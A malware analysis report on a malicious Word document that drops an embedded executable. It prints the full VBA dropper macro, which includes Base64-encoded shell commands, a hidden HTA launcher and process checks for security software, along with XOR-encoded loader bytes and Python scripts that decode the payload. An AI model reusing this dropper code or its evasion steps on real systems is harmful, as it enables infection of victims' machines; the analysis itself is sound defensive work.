Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 352ba37e368a4ca5…

MALICIOUS

Office (OLE)

Size: 207.5 KB · Created: 2018-09-05 11:49:00 · Authoring application: Microsoft Office Word · First seen: 2019-04-17
MD5: dcc53b3285f08291c36a001b3a4487eb · SHA-1: bd1109be884727b34378086bd43a756713b36914 · SHA-256: 352ba37e368a4ca54b3ed4228c86e793760de9f7026237a1f17bc7b85c204caf
Risk score: 838

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution (CVE-2007-3899 exploit shape, see heuristics)
T1059.005 Command and Scripting Interpreter: Visual Basic (Document_Open / Document_Close macros)
T1059.003 Command and Scripting Interpreter: Windows Command Shell (cmd.exe /c ping localhost -n 100 && 6.exe)
T1059.007 Command and Scripting Interpreter: JavaScript (JScript inside the dropped 1.hta)
T1218.005 System Binary Proxy Execution: Mshta (1.hta launched through WScript.Shell.Run)
T1518.001 Software Discovery: Security Software Discovery (bdagent.exe / PSUAMain.exe looked up via WMI)
T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion (3-second DoEvents loop, ping -n 100 delay)
T1140 Deobfuscate/Decode Files or Information (Base64 literals decoded through MSXML bin.base64)

The document carries the MS07-060 (CVE-2007-3899) malformed-string exploit shape flagged in the heuristics below, but the execution chain that is actually visible is a VBA one and needs no memory corruption. Document_Open (kfs, sdfsdf) moves the cursor onto the embedded OLE Package object and copies it to the clipboard, then expects the packaged 5C.pif to be present in %TEMP% (the path recorded in the Ole10Native header), copies it there to 6.exe and to 6.<extension read from UserForm1.TextBox1>, idles for three seconds, re-saves the document as a macro-free Word XML document (wdFormatXMLDocument, which removes the macro and the package from the file on disk) and quits. Quitting fires Document_Close (closee), which enumerates running processes over WMI (SELECT * FROM Win32_Process) to choose a launch method around installed security software: with bdagent.exe (Bitdefender) running it writes a Base64-decoded HTA to %TEMP%\1.hta that starts 6.exe through WScript.Shell and launches the HTA with WScript.Shell.Run; with PSUAMain.exe (Panda) running, or in the default case, it calls Shell on the Base64-decoded 'cmd.exe /c ping localhost -n 100 && ' followed by %TEMP%\6.exe or %TEMP%\6.pif. The ping is a roughly 100-second delay, not a download: every stage is carried inside the document (the Ole10Native package 5C.pif and the PE carved at offset 0x16E66 as embedded_office_00016e66.exe, whose 118,682-byte carve runs exactly to the end of the 207.5 KB file and so reflects the remaining file length rather than the image size), and the macro makes no network request.

Heuristics 20

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is corroborating Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Malware.Valyria-6698324-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6698324-0
  • XOR-encoded strings (key 0xD2) critical SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xD2: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly
    x86 disassembly · validity: code (0.823), no internal branches to corroborate control flow. The listing below disassembles the bytes as stored, i.e. still XOR-encoded: XOR each byte with 0xD2 before reading it. Decoded, the window starts with the string LoadLibraryA and contains the call $+5 / pop eax / jmp short idiom in front of VirtualAlloc, so the retf, ljmp and out instructions shown here are artefacts of the encoding rather than control flow.
    0002026C  9e                sahf
    0002026D  bdb3b69ebb        mov ebp, 0xbb9eb6b3
    00020272  b0a0              mov al, 0xa0
    00020274  b3a0              mov bl, 0xa0
    00020276  ab                stosd dword ptr es:[edi], eax
    00020277  93                xchg ebx, eax
    00020278  d25112            rcl byte ptr [ecx + 0x12], cl
    0002027B  d15b57            rcr dword ptr [ebx + 0x57], 1
    0002027E  ca2d2d            retf 0x2d2d
    00020281  2d8a5957ca        sub eax, 0xca57598a
    00020286  2d2d2d8259        sub eax, 0x59822d2d
    0002028B  9f                lahf
    0002028C  22832d870a5b      and al, byte ptr [ebx + 0x5b0a872d]
    00020292  57                push edi
    00020293  e62d              out 0x2d, al
    00020295  2d2d823ad2        sub eax, 0xd23a822d
    0002029A  d2d2              rcl dl, cl
    0002029C  d28a39df84bb      ror byte ptr [edx - 0x447b20c7], cl
    000202A2  a0a6a7b3be        mov al, byte ptr [0xbeb3a7a6]
    000202A7  93                xchg ebx, eax
    000202A8  bebebdb1d2        mov esi, 0xd2b1bdbe
    000202AD  51                push ecx
    000202AE  12d1              adc dl, cl
    000202B0  5b                pop ebx
    000202B1  57                push edi
    000202B2  ea2d2d2d8a5947    ljmp 0x4759:0x8a2d2d2d
    000202B9  ea2d2d2d805997    ljmp 0x9759:0x802d2d2d
    000202C0  22822d870a5b      and al, byte ptr [edx + 0x5b0a872d]
    000202C6  97                xchg edi, eax
    000202C7  6a82              push -0x7e
    000202C9  3ad2              cmp dl, dl
    000202CB  d2                .byte 0xd2
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set wsh = VBA.CreateObject("WScript.Shell")
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. In this sample, however, the moniker is only used for ExecQuery("SELECT * FROM Win32_Process") to enumerate running processes and branch on the presence of bdagent.exe and PSUAMain.exe; no Win32_Process.Create call is present. The WMI use here is security-software discovery, and the actual launches go through WScript.Shell.Run and Shell.
    Matched line in script
    Set gDvcvsd = GetObject("wi" & "nmgmts:")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set wsh = VBA.CreateObject("WScript.Shell")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set gDvcvsd = GetObject("wi" & "nmgmts:")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Open Environ("Temp") & "\1.hta" For Output As #1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The three below are standard OOXML schema namespace identifiers, not network destinations, and the macro makes no network request.
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography  In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml  In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
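The SC_XOR_ENCODED finding above shows the region as raw x86, which is why its disassembly has no usable control flow: the bytes are still encoded. The following Python is an added example, not part of the report or of its analysis engine. It takes the 96 bytes printed in that listing (offsets 0x2026C to 0x202CB), brute-forces the single-byte key by looking for known API names (the name list is an assumption), then reads the decoded buffer for NUL-terminated strings and for the call $+5 / pop eax / jmp short idiom a position-independent stub uses to take the address of a string it carries inline.

```python
"""Decode the SC_XOR_ENCODED region and recover what the loader stub does."""
import re

# Constructed input: the 96 bytes printed in the disassembly column of the
# SC_XOR_ENCODED finding (file offsets 0x2026C-0x202CB), copied from the listing.
REGION_BASE = 0x2026C
ENCODED = bytes.fromhex(
    "9e bd b3 b6 9e bb b0 a0 b3 a0 ab 93 d2 51 12 d1 5b 57 "
    "ca 2d 2d 2d 8a 59 57 ca 2d 2d 2d 82 59 9f 22 83 2d 87 0a 5b "
    "57 e6 2d 2d 2d 82 3a d2 d2 d2 d2 8a 39 df 84 bb a0 a6 a7 b3 be "
    "93 be be bd b1 d2 51 12 d1 5b 57 ea 2d 2d 2d 8a 59 47 "
    "ea 2d 2d 2d 80 59 97 22 82 2d 87 0a 5b 97 6a 82 3a d2 d2"
)

# Assumption: the API names a hand-rolled loader stub usually resolves; extend as needed.
API_NAMES = [b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc", b"VirtualProtect",
             b"CreateProcessA", b"WinExec", b"ExitProcess", b"WriteProcessMemory"]


def xor(data, key):
    return bytes(b ^ key for b in data)


def find_xor_key(data, names=API_NAMES):
    """Brute-force the single-byte key: the key whose decoding contains the most
    known API names wins. Returns None when no key reveals any name."""
    best_key, best_hits = None, 0
    for key in range(256):
        hits = sum(xor(data, key).count(n) for n in names)
        if hits > best_hits:
            best_key, best_hits = key, hits
    return best_key


def c_strings(decoded, base=0, min_len=4):
    """NUL-terminated printable ASCII runs in the decoded buffer, with file offsets."""
    pat = rb"[\x20-\x7e]{%d,}\x00" % min_len
    return [(base + m.start(), m.group()[:-1].decode("ascii"))
            for m in re.finditer(pat, decoded)]


# call $+5 ; pop eax ; jmp short <over the string> : after the jump, eax + 3 points
# at the string that follows, so the stub gets an address without any relocation.
CALL_POP_JMP = re.compile(rb"\xe8\x00\x00\x00\x00\x58\xeb(.)", re.DOTALL)


def inline_strings(decoded, base=0):
    """Return (offset_of_call, string, three bytes after the string) per occurrence."""
    found = []
    for m in CALL_POP_JMP.finditer(decoded):
        skip = m.group(1)[0]          # rel8 of the jmp = length of the inline string
        start = m.end()
        text = decoded[start:start + skip].rstrip(b"\x00").decode("ascii", "replace")
        found.append((base + m.start(), text, decoded[start + skip:start + skip + 3]))
    return found


def analyze(data=ENCODED, base=REGION_BASE):
    key = find_xor_key(data)
    if key is None:
        return {"key": None}
    decoded = xor(data, key)
    return {"key": key, "decoded": decoded,
            "strings": c_strings(decoded, base),
            "inline": inline_strings(decoded, base)}


if __name__ == "__main__":
    r = analyze()
    print("key: 0x%02x" % r["key"])
    for off, s in r["strings"]:
        print("  %08X  %s" % (off, s))
    for off, s, nxt in r["inline"]:
        print("  call/pop/jmp at %08X -> %r, followed by %s" % (off, s, nxt.hex()))
    print("decoded bytes:", r["decoded"].hex())
```

With key 0xD2 the window decodes to LoadLibraryA\0 followed by add eax, 3 (83 c0 03, which steps eax past the pop and jmp that preceded the string), then a GetProcAddress-style call through [ebp-0x28], and at 0x20298 the same call/pop/jmp idiom introduces VirtualAlloc. Feed the decoded buffer, not the stored bytes, to a real disassembler.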

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5641 bytes
SHA-256: 5d918920ca6728791af74c42e77df828322a06bb8bb1737ec56702928c6760fa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next


Call kfs
    


Call sdfsdf

 Set d = New DataObject
    d.SetText " "
    d.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)


Call Module1.killo

End Sub

Private Sub Document_Close()
Call closee

End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Attribute VB_Name = "Module2"
Sub closee()



Dim Hdfgdwd, gDvcvsd
Dim fdfdgsd
Set gDvcvsd = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set Hdfgdwd = gDvcvsd.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In Hdfgdwd
Set wsh = VBA.CreateObject("WScript.Shell")
Dim pipec As Boolean: pipec = True


 If x.Name = "bdagent.exe" Then
 Dim kk
 kk = StrConv(DecodeBase64("IFdJT" & "kRPV1N" & "UQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode)
 
Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
  Print #1, kk
  Close #1
  
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
   End If
    
   
    If x.Name = "PSUAMain.exe" Then

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
Next


Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide


End Sub


Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function



Attribute VB_Name = "Module3"
Sub kfs()
Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
 Selection.MoveRight Unit:=wdCharacter, Count:=24
    Selection.TypeBackspace
        Selection.Copy

End Sub

Attribute VB_Name = "Module4"

Sub sdfsdf()

Dim kk, lll
lll = "e" & "xe"
kk = ".p" & "if"
ChDir Environ("Temp")
Selection.TypeBackspace

   Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")


FSO.copyfile Source:="5C" & kk, Destination:="6." & lll
FSO.copyfile Source:="5C" & kk, Destination:="6" & UserForm1.TextBox1.Text
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function



Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{7BD97CFF-E6A6-411C-901C-6DFCC38C80A6}{DBC2429A-F48B-41A6-97FF-83968A45408A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E296C0D9-B460-4B9A-BE4F-EF37BBB80D0B}{FE155B10-F35F-4245-A78C-ABC85D7D2F90}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
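To see what the Base64 stager in Module2.closee drops and runs without opening the document, the following Python replays the relevant statements statically. It is an added example, not part of the report or its tooling: the statements are copied from the preview above with the Base64 literals verbatim, %TEMP% stands in for Environ("Temp") because the victim path is unknown, and the mini-evaluator understands only the constructs this macro uses (string literals joined with &, StrConv(DecodeBase64(...), vbUnicode), Environ, and variables assigned earlier). Anything else is skipped for manual review.

```python
"""Statically replay the Base64 stager: decode the literals, rebuild the dropped
1.hta exactly as the two Print #1 statements write it, and list the launch lines."""
import base64
import re

# Constructed input: the drop/launch statements of Module2.closee from the
# macros.bas preview, copied verbatim (Base64 literals included).
CLOSEE_SNIPPET = r'''
 If x.Name = "bdagent.exe" Then
 kk = StrConv(DecodeBase64("IFdJT" & "kRPV1N" & "UQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode)
Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
  Print #1, kk
  Close #1
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
   End If
    If x.Name = "PSUAMain.exe" Then
  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
Exit Sub
   End If
Next
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide
'''


def decode_ansi(b64):
    """What DecodeBase64 + StrConv(..., vbUnicode) yield: MSXML bin.base64 bytes read
    back as an ANSI (cp1252) string. Missing padding is restored, as MSXML tolerates it."""
    b64 = re.sub(r"\s+", "", b64)
    return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("cp1252")


def split_concat(expr):
    """Split a VBA expression on top-level '&' (outside quotes and parentheses)."""
    parts, cur, depth, in_str = [], "", 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "&" and depth == 0:
                parts.append(cur)
                cur = ""
                continue
        cur += ch
    parts.append(cur)
    return [p.strip() for p in parts]


def evaluate(expr, env, names):
    """Evaluate the small expression language the stager uses."""
    terms = split_concat(expr)
    if len(terms) > 1:
        return "".join(evaluate(t, env, names) for t in terms)
    t = terms[0]
    if len(t) >= 2 and t[0] == t[-1] == '"':
        return t[1:-1]
    if t in names:                       # a variable assigned earlier, e.g. kk
        return names[t]
    m = re.fullmatch(r"StrConv\((.*),\s*vbUnicode\)", t, re.S)
    if m:
        return evaluate(m.group(1), env, names)
    m = re.fullmatch(r"DecodeBase64\((.*)\)", t, re.S)
    if m:
        return decode_ansi(evaluate(m.group(1), env, names))
    m = re.fullmatch(r"Environ\((.*)\)", t, re.S)
    if m:
        return env[evaluate(m.group(1), env, names)]
    raise ValueError("unsupported term: " + t)


def replay(src, temp="%TEMP%"):
    """Walk the macro text and execute only the statements that matter for triage:
    assignments, Open/Print/Close (dropped files) and Shell / wsh.Run (launches)."""
    env, names, files, launches, current = {"Temp": temp}, {}, {}, [], None
    for line in src.splitlines():
        s = line.strip()
        try:
            if m := re.fullmatch(r"Open (.+) For Output As #1", s):
                current = evaluate(m[1], env, names)
                files[current] = ""
            elif m := re.fullmatch(r"Print #1, (.+)", s):
                files[current] += evaluate(m[1], env, names) + "\r\n"   # Print # appends CRLF
            elif s == "Close #1":
                current = None
            elif m := re.fullmatch(r"Shell (.+), vbHide", s):
                launches.append(("Shell", evaluate(m[1], env, names)))
            elif m := re.fullmatch(r"wsh\.Run (.+), 0, False", s):
                launches.append(("WScript.Shell.Run", evaluate(m[1], env, names)))
            elif m := re.fullmatch(r"(\w+) = (.+)", s):
                names[m[1]] = evaluate(m[2], env, names)
        except (ValueError, KeyError):
            pass   # a statement outside the modelled subset; leave it for manual review
    return {"files": files, "launches": launches}


if __name__ == "__main__":
    result = replay(CLOSEE_SNIPPET)
    for path, content in result["files"].items():
        print("dropped %s (%d bytes):\n%s" % (path, len(content), content))
    for how, cmd in result["launches"]:
        print("launch via %s: %s" % (how, cmd))
```

The rebuilt 1.hta is a window moved off-screen that runs 6.exe through WScript.Shell from the current directory (the macro has done ChDir to %TEMP% first) and then closes itself; the two Shell lines are the same cmd.exe /c ping delay followed by %TEMP%\6.exe or %TEMP%\6.pif. No URL appears anywhere in the decoded output.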
embedded_office_00016e66.exe embedded-pe Office MZ+PE at offset 0x16E66 118682 bytes
SHA-256: b7121de4b320ec80a7d030a454c4bffe44360475f2ebbab5da24ddeba954f041
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1597663758/Ole10Native 72980 bytes
SHA-256: d2d95478d8941fa826533aee7ac66a26be7b2d03ed3cb80a5c76e3e7f8e5c7f1
ole10native_00_5C.pif ole-package-payload OLE Ole10Native payload: ObjectPool/_1597663758/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file= 72704 bytes
SHA-256: 5b4918e5c17099b65c96b2fc6765143f20c06e7bc38b168b4892b4a3237a8b26
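The OFFICE_PACKAGE_RISKY_FILE heuristic reduces to one check on the header of the Ole10Native stream listed just above: does any filename recorded in it (label, original path, temp path) end in an extension the shell runs on open. The following Python is an added example, not from the report or its engine. It parses the Ole10Native (Packager) layout as commonly documented (an assumption; cross-check against oletools' oleobj if a stream parses oddly), applies that extension check, and includes a builder so a test stream can be constructed offline; the test stream below only reuses the label and path the report prints, with a dummy PE stub as payload, and the set of auto-executable extensions is an assumption.

```python
"""Parse an Ole10Native (Packager) stream and apply the auto-executable check
behind OFFICE_PACKAGE_RISKY_FILE."""
import os
import struct

# Assumption: extensions Explorer or the default script host runs directly on open.
AUTO_EXEC_EXTS = {".exe", ".pif", ".com", ".scr", ".bat", ".cmd", ".vbs", ".vbe",
                  ".js", ".jse", ".wsf", ".wsh", ".hta", ".cpl", ".msi", ".lnk"}


def _cstr(buf, pos):
    """Read a NUL-terminated cp1252 string at pos; return (text, position after NUL)."""
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("cp1252"), end + 1


def parse_ole10native(stream):
    """Assumed layout: u32 size_of_rest, u16 flags1, NUL-terminated label,
    NUL-terminated original path, u32 flags2, u32 temp_path_len (NUL included),
    temp path, u32 data_size, data; a trailing Unicode copy of the names is ignored."""
    size_of_rest, flags1 = struct.unpack_from("<IH", stream, 0)
    label, pos = _cstr(stream, 6)
    orig_path, pos = _cstr(stream, pos)
    flags2, temp_len = struct.unpack_from("<II", stream, pos)
    pos += 8
    temp_path = stream[pos:pos + temp_len].split(b"\x00", 1)[0].decode("cp1252")
    pos += temp_len
    (data_size,) = struct.unpack_from("<I", stream, pos)
    pos += 4
    data = stream[pos:pos + data_size]
    if len(data) != data_size:
        raise ValueError("Ole10Native data truncated: %d of %d bytes" % (len(data), data_size))
    return {"label": label, "orig_path": orig_path, "temp_path": temp_path,
            "flags": (flags1, flags2), "data": data,
            "size_consistent": size_of_rest == len(stream) - 4}


def assess_package(stream):
    """The heuristic's check: any recorded filename with a run-on-open extension,
    plus whether the payload bytes start with a PE (MZ) header."""
    info = parse_ole10native(stream)
    names = [info["label"], info["orig_path"], info["temp_path"]]
    exts = {os.path.splitext(n.replace("\\", "/"))[1].lower() for n in names if n}
    info["risky_ext"] = sorted(exts & AUTO_EXEC_EXTS)
    info["is_pe"] = info["data"][:2] == b"MZ"
    info["verdict"] = "dropper" if info["risky_ext"] or info["is_pe"] else "review"
    return info


def build_ole10native(label, orig_path, temp_path, data):
    """Inverse of the parser (same assumed layout), for constructing test streams."""
    tp = temp_path.encode("cp1252") + b"\x00"
    rest = (struct.pack("<H", 2)
            + label.encode("cp1252") + b"\x00"
            + orig_path.encode("cp1252") + b"\x00"
            + struct.pack("<II", 0x300, len(tp)) + tp
            + struct.pack("<I", len(data)) + data)
    return struct.pack("<I", len(rest)) + rest


if __name__ == "__main__":
    # Constructed sample: the report's label and path with a dummy PE stub as payload.
    sample = build_ole10native("5C.pif", r"C:\Users\win7home\AppData\Local\Temp\5C.pif", "",
                               b"MZ" + b"\x00" * 62 + b"PE\x00\x00")
    info = assess_package(sample)
    print({k: v for k, v in info.items() if k != "data"})
```

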